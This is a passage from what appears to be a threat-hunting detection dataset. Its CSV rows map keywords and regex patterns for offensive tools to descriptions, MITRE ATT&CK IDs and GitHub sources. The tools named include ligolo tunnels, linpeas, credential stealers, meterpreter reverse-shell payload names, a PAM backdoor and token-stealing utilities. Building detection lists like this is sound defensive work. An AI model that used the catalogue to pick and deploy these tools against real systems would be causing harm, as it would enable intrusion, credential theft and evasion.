tools","https://github.com/icyguider/LightsOut","1","1","N/A","10","4","304","43","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" "*LightsOut-master.zip*",".{0,1000}LightsOut\-master\.zip.{0,1000}","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","10","4","304","43","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" "*ligolo.lan*",".{0,1000}ligolo\.lan.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ligolo_darwin*",".{0,1000}ligolo_darwin.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ligolo_linux*",".{0,1000}ligolo_linux.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ligolo_windows*.exe*",".{0,1000}ligolo_windows.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ligolo-master*",".{0,1000}ligolo\-master.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ligolo-ng -selfcert*",".{0,1000}ligolo\-ng\s\-selfcert.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ligolo-ng_agent*",".{0,1000}ligolo\-ng_agent.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*ligolo-ng_proxy*",".{0,1000}ligolo\-ng_proxy.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*ligolo-ng-master*",".{0,1000}ligolo\-ng\-master.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*Lime-Crypter.exe*",".{0,1000}Lime\-Crypter\.exe.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","1","N/A","9","5","445","192","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z" "*LimerBoy/Adamantium-Thief*",".{0,1000}LimerBoy\/Adamantium\-Thief.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*LinEnum.sh*",".{0,1000}LinEnum\.sh.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","10","10","6668","1964","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" "*LinEnum-master.ip*",".{0,1000}LinEnum\-master\.ip.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","10","10","6668","1964","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" "*linikatz.sh*",".{0,1000}linikatz\.sh.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*linikatz.zip*",".{0,1000}linikatz\.zip.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*linikatzV2.sh*",".{0,1000}linikatzV2\.sh.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","N/A","10","2","125","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z" "*link_tcp 127.0.0.1 *",".{0,1000}link_tcp\s127\.0\.0\.1\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*linkedin2username.py -u*",".{0,1000}linkedin2username\.py\s\-u.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*LinkedInt*",".{0,1000}LinkedInt.{0,1000}","offensive_tool_keyword","LinkedInt","LinkedInt: A LinkedIn scraper for reconnaissance during adversary simulation","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/mdsecactivebreach/LinkedInt","1","0","N/A","5","5","470","112","2023-05-23T23:34:22Z","2017-07-12T12:58:47Z" "*link-inject*inject link into process*",".{0,1000}link\-inject.{0,1000}inject\slink\sinto\sprocess.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*linpeas_builder.py*",".{0,1000}linpeas_builder\.py.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*linpeas_darwin_amd64*",".{0,1000}linpeas_darwin_amd64.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*linpeas_darwin_amd64*",".{0,1000}linpeas_darwin_amd64.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*linpeas_darwin_arm64*",".{0,1000}linpeas_darwin_arm64.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*linpeas_darwin_arm64*",".{0,1000}linpeas_darwin_arm64.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*linpeas_fat.sh*",".{0,1000}linpeas_fat\.sh.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*linpeas_linux_386*",".{0,1000}linpeas_linux_386.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*linpeas_linux_386*",".{0,1000}linpeas_linux_386.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*linpeas_linux_amd64*",".{0,1000}linpeas_linux_amd64.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*linpeas_linux_amd64*",".{0,1000}linpeas_linux_amd64.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*linpeas_linux_arm*",".{0,1000}linpeas_linux_arm.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*linpeas_linux_arm64*",".{0,1000}linpeas_linux_arm64.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*linux/x64/meterpreter/reverse_tcp*",".{0,1000}linux\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*linux/x64/shell_reverse_tcp*",".{0,1000}linux\/x64\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*linux_hostrecon*",".{0,1000}linux_hostrecon.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*linux_hostrecon.*",".{0,1000}linux_hostrecon\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Linux_LPE_eBPF_CVE*",".{0,1000}Linux_LPE_eBPF_CVE.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*linux_sudo_cve-2017-1000367.c*",".{0,1000}linux_sudo_cve\-2017\-1000367\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*linux_trap_command.py*",".{0,1000}linux_trap_command\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*linux_x64_agent --report * -l * -s ph4ntom*",".{0,1000}linux_x64_agent\s\-\-report\s.{0,1000}\s\-l\s.{0,1000}\s\-s\sph4ntom.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*LinuxARMLELF32.py*",".{0,1000}LinuxARMLELF32\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*linux-exploit-suggester*",".{0,1000}linux\-exploit\-suggester.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*linux-exploit-suggester*",".{0,1000}linux\-exploit\-suggester.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*linux-exploit-suggester.sh*",".{0,1000}linux\-exploit\-suggester\.sh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*linux-pam-backdoor-master*",".{0,1000}linux\-pam\-backdoor\-master.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","N/A","10","3","294","81","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z" "*linuxprivchecker*",".{0,1000}linuxprivchecker.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","N/A","N/A","10","1482","491","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z" "*linuxprivchecker*",".{0,1000}linuxprivchecker.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*linux-rds-exploit.c*",".{0,1000}linux\-rds\-exploit\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*linux-smart-enumeration.sh*",".{0,1000}linux\-smart\-enumeration\.sh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*linux-smart-enumeration-master*",".{0,1000}linux\-smart\-enumeration\-master.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*linWinPwn-*",".{0,1000}linWinPwn\-.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*linWinPwn.*",".{0,1000}linWinPwn\..{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*lion2john.pl*",".{0,1000}lion2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*lion2john-alt.pl*",".{0,1000}lion2john\-alt\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*LiquidSnake.exe*",".{0,1000}LiquidSnake\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","321","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*List the named pipes on a remote system*",".{0,1000}List\sthe\snamed\spipes\son\sa\sremote\ssystem.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","#contentstrings","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*list/steal token of user *default NT AUTHORITY\\SYSTEM for comamnd execution*",".{0,1000}list\/steal\stoken\sof\suser\s\.{0,1000}default\sNT\sAUTHORITY\\\\SYSTEM\sfor\scomamnd\sexecution.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#program content","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*list_backdoors*",".{0,1000}list_backdoors.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*List_Privileges /Process:powershell*",".{0,1000}List_Privileges\s\/Process\:powershell.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*list_tcppivot*",".{0,1000}list_tcppivot.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*list_tokens -u*",".{0,1000}list_tokens\s\-u.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Incognito","10","10","N/A","N/A","N/A","N/A" "*ListAccountsWithSPN*",".{0,1000}ListAccountsWithSPN.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*List-AllMailboxAndPST.ps1*",".{0,1000}List\-AllMailboxAndPST\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - 